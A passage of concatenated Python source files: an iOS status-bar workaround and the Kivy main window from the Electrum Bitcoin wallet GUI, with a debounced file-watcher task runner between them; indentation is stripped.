sv, NSLayoutAttributeWidth, NSLayoutRelationEqual, view, NSLayoutAttributeWidth, 1.0, 0.0 ))
@staticmethod
def create_and_add_blur_view(parent : UIView, effectStyle = UIBlurEffectStyleRegular) -> UIView:
blurView = None
if parent:
effect = UIBlurEffect.effectWithStyle_(effectStyle)
blurView = UIVisualEffectView.alloc().initWithEffect_(effect).autorelease()
blurView.frame = parent.frame
parent.addSubview_(blurView)
return blurView
###
### iOS13 Status Bar Workaround stuff
###
class ios13_status_bar_workaround:
''' iOS 13.0+ introduced a new "bug" where the top status bar produced by
iOS cannot be covered by our popup notification. As a result, if on iOS 13+
and on non-iPhoneX, we must hide the iOS built-in status bar otherwise our
"Downloading headers..." status notification gets garbled and intermixed
with the iOS status bar. On iPhone X or above, the status bar from iOS is in
the notch area, and we avoid that area, so we don't need this workaround for
latest phones. Just iPhone 4, 5, 6, 7, & 8.
Use cls.push() when presenting a new notification and cls.pop()
when it is dismissed.
When the first notification is presented, the status bar will be hidden.
When the last notification is dismissed, the status bar will be shown again.
Note this mechanism violates encapsulation and accesses the
ElectrumWindow.gui.window instance to modify the window geometry. '''
# - PRIVATE
_lock = threading.Lock()
_ctr = 0
_needs_workaround = None
_application = None
def noop_if_not_needed(func):
def wrapper(*args, **kwargs):
cls = (args and args[0]) or __class__
cls._chk_init_cache_values()
if not cls._needs_workaround:
return
return func(*args, **kwargs)
return wrapper
# + PUBLIC Helpers
@staticmethod
def does_status_bar_clash_with_notifications() -> bool:
''' Returns True iff the we are on iOS 13.0+ and not on an iPhoneX.
(In that case we need to do the workaround.) Returns False otherwise. '''
try:
return bool(ios_version_tuple()[0] >= 13 and not is_iphoneX())
except Exception as e:
print("ERROR trying to figure out if we should hide the status bar:", repr(e))
return True
@staticmethod
def is_workaround_possible() -> bool:
''' Returns True iff iPhone, False otherwise. '''
return not is_ipad()
# + PUBLIC INTERFACE
@classmethod
def appdelegate_hook(cls, appdelegate : ObjCInstance, application : ObjCInstance) -> None:
''' Hook intended to be called from the `application:willFinishLaunchingWithOptions:`
UIApplicationDelegate method. Basically all it does is unconditionally
hide the status bar if on and iPad running iOS >= 13.0, otherwise
is essentially a noop. '''
cls._application = application # cache singleton now while we're at it
if (cls.does_status_bar_clash_with_notifications()
and not cls.is_workaround_possible()):
# on iPad we just hide the status bar permanently. If they want to
# see it they can always put the app in a window then it will be
# visible.
application.setStatusBarHidden_(True)
@classmethod
@noop_if_not_needed
def push(cls):
with cls._lock:
if not cls._ctr:
# latch the status bar as hidden when _ctr is 0
cls._status_bar_hide()
cls._ctr += 1
return cls._ctr
@classmethod
@noop_if_not_needed
def pop(cls):
with cls._lock:
if cls._ctr <= 1:
# latch the status bar as visible when the _ctr hits 0
cls._status_bar_unhide()
cls._ctr = 0
else:
cls._ctr -= 1
@classmethod
@noop_if_not_needed
def on_rotated(cls):
with cls._lock:
if not cls._ctr:
return
# at this point we know a notification is up, so readjust our window
# (note that the window only readjusts if we are in portrait mode)
cls._status_bar_hide()
# - PRIVATE
@classmethod
def _chk_init_cache_values(cls):
# cache some values
if cls._needs_workaround is None:
cls._needs_workaround = cls.does_status_bar_clash_with_notifications() and cls.is_workaround_possible()
if cls._application is None:
cls._application = UIApplication.sharedApplication
@classmethod
def _status_bar_hide(cls):
''' latch the status bar off '''
def sb_height():
s = cls._application.statusBarFrame.size
return min(s.width, s.height)
sb_height_was = sb_height() # save current status bar height for adjustment below...
cls._application.setStatusBarHidden_(True)
from . import gui
g = gui.ElectrumGui.gui
if g and g.window:
g.window.frame = r = UIScreen.mainScreen.bounds # this breaks on iPad in windowed mode.... TODO: FIX!
# Move window down so it doesn't glitch up after we hid the status bar
# Note that `sb_height_was` may be 0 if we didn't have a status bar
# visible (ie we are in landscape mode).
r.origin.y += sb_height_was
r.size.height -= sb_height_was
g.window.frame = r
@classmethod
def _status_bar_unhide(cls):
''' latch the status bar on '''
cls._application.setStatusBarHidden_(False)
# portrait mode, hiding the status bar had an effect... adjust the window
from . import gui
g = gui.ElectrumGui.gui
if g and g.window:
# restore window to its full position.. at this point
# mainScreen.bounds is under the status bar (if visible)
g.window.frame = UIScreen.mainScreen.bounds # this breaks on iPad in windowed mode.... TODO: FIX!
#/end ios13_status_bar_workaround
|
io_handler.py
|
# *-* encoding: utf-8
from __future__ import division, print_function
import logging
import datetime
import os
import sys
import subprocess
import threading
import time
from .colors import color, FG, BG, Style
from .config import ConfigError
logger = logging.getLogger(__name__)
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self):
super(StoppableThread, self).__init__()
self._stop_event = threading.Event()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
class Debouncer(object):
def __init__(self):
self.lock = threading.Lock()
self.status = None
self.thread = None
self.queued = None
self.trigger_time = None
# We cannot bind func/debounce_time to the thread function,
# because otherwise we couldn't update the func anymore during
# waiting.
self.func = None
self.debounce_time = None
def _thread_func(self):
while True:
# Note the sleep based implementation has the drawback that something
# like this would behave a bit unexpected:
#
# debouncer.trigger(f, 1.0)
# time.sleep(0.001)
# debouncer.trigger(f, 0.001)
#
# After the first trigger we would sleep for an entire second, and even
# though the second trigger updates self.debounce_time, we cannot stop
# the ongoing sleep. Do we want to support this?
trigger_time_debounced = self.trigger_time + datetime.timedelta(seconds=self.debounce_time)
# print("trigger time: {}".format(self.trigger_time))
# print("trigger time debounced: {}".format(trigger_time_debounced))
now = datetime.datetime.now()
time_to_sleep = (trigger_time_debounced - now).total_seconds()
# print("time to sleep: {}".format(time_to_sleep))
if time_to_sleep > 0:
time.sleep(time_to_sleep)
else:
break
with self.lock:
self.status = "running"
logger.info(u"Task [---]: debounce wait finished, starting task")
self.func()
logger.info("Task [▴▴▴]: finished")
with self.lock:
if self.queued is None:
self.status = None
self.thread = None
else:
logger.info("Task [▾▾▾]: starting thread (from queued trigger)")
# unwrap / unset queued args
(func, debounce_time) = self.queued
self.queued = None
# update trigger
self.trigger_time = datetime.datetime.now()
# update args
self.func = func
self.debounce_time = debounce_time
# change status
self.status = "waiting"
self.thread = self._start_thread()
def trigger(self, func, debounce_time, enqueue):
with self.lock:
if self.status is None:
logger.info(u"Task [▾▾▾]: starting thread")
# update trigger
self.trigger_time = datetime.datetime.now()
# update args
self.func = func
self.debounce_time = debounce_time
# change status
self.status = "waiting"
self.thread = self._start_thread()
elif self.status == "waiting":
logger.info(u"Task [---]: debouncing event")
# update trigger
self.trigger_time = datetime.datetime.now()
# update args
self.func = func
self.debounce_time = debounce_time
# no status change
elif self.status == "running":
# update args (delayed)
if enqueue:
self.queued = (func, debounce_time)
logger.info("Task [---]: still in progress => queuing trigger")
else:
logger.info("Task [---]: still in progress => discarding trigger")
def _start_thread(self):
thread = threading.Thread(target=self._thread_func)
thread.start()
return thread
class ExecInfo(object):
def __init__(self, command, runtime, retcode):
self.command = command
self.runtime = runtime
self.retcode = retcode
class LaunchInfo(object):
def __init__(self, old_config, trigger, config_factory, on_task_finished):
self.old_config = old_config
self.trigger = trigger
self.config_factory = config_factory
self.on_task_finished = on_task_finished
class IOHandler(object):
"""
Helper class to handle asynchronous IO (running tasks, logging, event queuing).
"""
def __init__(self, working_dir):
self.working_dir = working_dir
self.debouncer = Debouncer()
def trigger(self, launch_info):
self.debouncer.trigger(
lambda: self._run_task(launch_info),
0.2, # TODO make configurable
launch_info.old_config.task.queue_events,
)
def _run_task(self, launch_info):
exec_infos = []
old_config = launch_info.old_config
if old_config.task.clear_screen:
self._clear_screen()
print(" * Trigger: {}".format(launch_info.trigger))
try:
config = launch_info.config_factory.load_config()
except ConfigError as e:
print(" * {}Error reloading config{}:\n{}".format(
color(FG.red),
color(),
e,
))
# Note: No config available, fallback to old config...
if old_config.sound:
self._notify_sound(success=False)
if old_config.notifications:
messages = ["Error reloading config:\n{}".format(e)]
self._notify_display(success=False, messages=messages)
return
for command in config.task.commands:
# additional newline to separate from task output
print(" * Running: {}{}{}\n".format(
color(FG.blue, style=Style.bold),
command,
color()
))
sys.stdout.flush()
t1 = time.time()
proc = subprocess.Popen(command, shell=True, cwd=self.working_dir)
retcode = proc.wait()
t2 = time.time()
exec_infos.append(ExecInfo(command, t2 - t1, retcode))
success = self._report_task_result(exec_infos)
if config.sound:
self._notify_sound(success)
if config.notifications:
messages = [
"'{}' took {:.1f} sec and returned {}.".format(e.command, e.runtime, e.retcode)
for e in exec_infos
]
self._notify_display(success, messages)
# Return re-loaded config to monitoring thread
launch_info.on_task_finished(config)
def _report_task_result(self, exec_infos):
# additional newline to separate from task output
print("\n * Task summary:")
success = True
for exec_info in exec_infos:
if exec_info.retcode == 0:
return_color = FG.green
else:
return_color = FG.red
success = False
print(" {}{}{} took {}{:.1f}{} sec and returned {}{}{}.".format(
color(FG.blue, style=Style.bold),
exec_info.command,
color(),
color(FG.yellow, style=Style.bold),
exec_info.runtime,
color(),
color(return_color, style=Style.bold),
exec_info.retcode,
color(),
))
print(" * Monitoring '{}' for changes... [Press <CTRL>+C to exit]".format(self.working_dir))
sys.stdout.flush()
return success
@staticmethod
def _notify_sound(success):
# TODO: make configurable
file_positive = "456581__bumpelsnake__nameit5.wav"
file_negative = "377017__elmasmalo1__notification-pop.wav"
if success:
snd_file = os.path.join(os.path.dirname(__file__), "sounds", file_positive)
else:
snd_file = os.path.join(os.path.dirname(__file__), "sounds", file_negative)
try:
p = subprocess.Popen(
["ffplay", "-nodisp", "-autoexit", "-hide_banner", snd_file],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
except Exception as e:
print(" * Failed to play sound notification:\n{}".format(e))
@staticmethod
def _notify_display(success, messages):
if success:
title = "SUCCESS"
else:
title = "FAILURE"
try:
p = subprocess.Popen(
["notify-send", title, "\n".join(messages)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
except Exception as e:
print(" * Failed to send notification:\n{}".format(e))
@staticmethod
def _clear_screen():
if os.name == 'nt':
os.system("cls")
else:
# Trying this approach to avoid losing scrollback:
# https://askubuntu.com/a/997893/161463
sys.stdout.write('\33[H\33[2J')
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
